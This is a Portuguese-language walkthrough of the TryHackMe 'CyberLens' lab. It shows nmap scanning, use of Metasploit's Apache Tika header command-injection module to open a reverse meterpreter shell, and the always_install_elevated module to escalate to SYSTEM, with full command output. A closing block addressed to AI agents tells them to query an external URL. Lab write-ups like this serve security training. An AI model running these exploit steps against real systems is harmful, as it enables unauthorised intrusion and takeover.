# CyberLens

<div data-full-width="false"><figure><img src="/files/DcrNMbyY8albUioUQDOl" alt=""><figcaption></figcaption></figure></div>

{% embed url="<https://tryhackme.com/r/room/cyberlensp6>" %}

**Classificação** : Fácil

**Criador** : [Tyler Ramsbey](https://www.youtube.com/@TylerRamsbey)

**Ferramentas** : Nmap, Metasploit

Colocar `cyberlens.thm` no arquivo `/etc/hosts`

```bash
echo '10.10.252.163 cyberlens.thm' >> /etc/hosts
```

### Enumeração

Não usei o nmap com a opção `-p-`  porque eu realmente precisava dormir, então dei uma olhada no site e no seu código fonte

<figure><img src="/files/fb2tpJc9oaEcEll0rvFb" alt=""><figcaption></figcaption></figure>

Mais a baixo do site, há um botão `Get Metadata`  então verifiquei o seu evento, ele me rediriciona para o seguite :&#x20;

<figure><img src="/files/8DydPpwrwZpV2EHFGRae" alt=""><figcaption></figcaption></figure>

`61777` é uma porta bastante incomun, quis saber o que há nela com o `nmap` &#x20;

```bash
$ nmap -sC -sV -p61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 20:25 EDT
Nmap scan report for cyberlens.thm (10.10.252.163)
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
61777/tcp open  http    Jetty 8.y.z-SNAPSHOT
|_http-cors: HEAD GET
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Welcome to the Apache Tika 1.17 Server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds

```

Nota-se claramente que há um servidor web rodando, então a primeira coisa a fazer é procurar um CVE para esta versão do Apache Tika com o `searchsploit`

<pre class="language-bash"><code class="lang-bash"><strong>$ searchsploit Apache Tika 1.17 
</strong>------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)                            | windows/remote/47208.rb
Apache Tika-server &#x3C; 1.18 - Command Injection                                              | windows/remote/46540.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

</code></pre>

Iniciar o metasploit para procurarmos por um exploit

```bash
$ msfconsole -q 
msf6 > search type:exploit apache tika

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript

msf6 > use exploit/windows/http/apache_tika_jp2_jscript
```

### Obtendo acesso

Definir as opções :&#x20;

* RHOST
* LHOST
* RPORT (61777)

Em seguida iniciar a exploração com \`run ou exploit\` e obter uma sessão meterpreter

```bash
[*] Meterpreter session 1 opened (10.9.225.130:4444 -> 10.10.252.163:49945) at 2024-05-19 20:45:34 -0400

meterpreter > sysinfo 
Computer        : CYBERLENS
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

```

Podemos localizar a flag \`user\` na área de trabalho

```powershell
Directory of C:\Users\CyberLens\Desktop

06/06/2023  07:53 PM    <DIR>          .
06/06/2023  07:53 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/06/2023  07:54 PM                25 user.txt <---
               3 File(s)          1,106 bytes
               2 Dir(s)  14,947,811,328 bytes free
```

### Escalação de privilégios

A vulnerabilidade é um pouco antiga, de certeza que o metasploit já tenha indexado isso nos seus bancos de dados, executei o módulo `multi/recon/local_exploit_suggester` descobrindo três vulnerabilidades

```powershell
msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  1         meterpreter x86/windows  CYBERLENS\CyberLens @ CYBERLENS  10.9.225.130:4444 -> 10.10.252.163:49945 (10.10.252.1
                                                                      63)

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.252.163 - Collecting local exploits for x86/windows...
[*] 10.10.252.163 - 193 exploit checks are being tried...

...SNIP...

 1   exploit/windows/local/always_install_elevated                  Yes                      The target is vulnerable.
 2   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.                                                                                                                         
 3   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.                                                                                                                         
 4   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.                                                                                                                         
 5   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.                
```

Começaremos pelo primeiro configurando as opções :&#x20;

* LHOST
* LPORT
* SESSION

```bash
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set lhost 10.9.225.130
lhost => 10.9.225.130
msf6 exploit(windows/local/always_install_elevated) > set lport 4444
lport => 4444
msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 10.9.225.130:4444 
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\bxmbsQXGgcxx.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 10.10.252.163
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\bxmbsQXGgcxx.msi
[*] Meterpreter session 2 opened (10.9.225.130:4444 -> 10.10.252.163:49950) at 2024-05-19 21:04:21 -0400

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
```

Podemos encontrar a flag na área de trabalho do administrador

```powershell
Directory of C:\Users\Administrator\Desktop

06/06/2023  07:45 PM    <DIR>          .
06/06/2023  07:45 PM    <DIR>          ..
11/27/2023  07:50 PM                24 admin.txt <----
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
               3 File(s)          1,105 bytes
               2 Dir(s)  14,947,409,920 bytes free

C:\Users\Administrator\Desktop>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://savitar.gitbook.io/mynotes/writeups/tryhackme/cyberlens.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.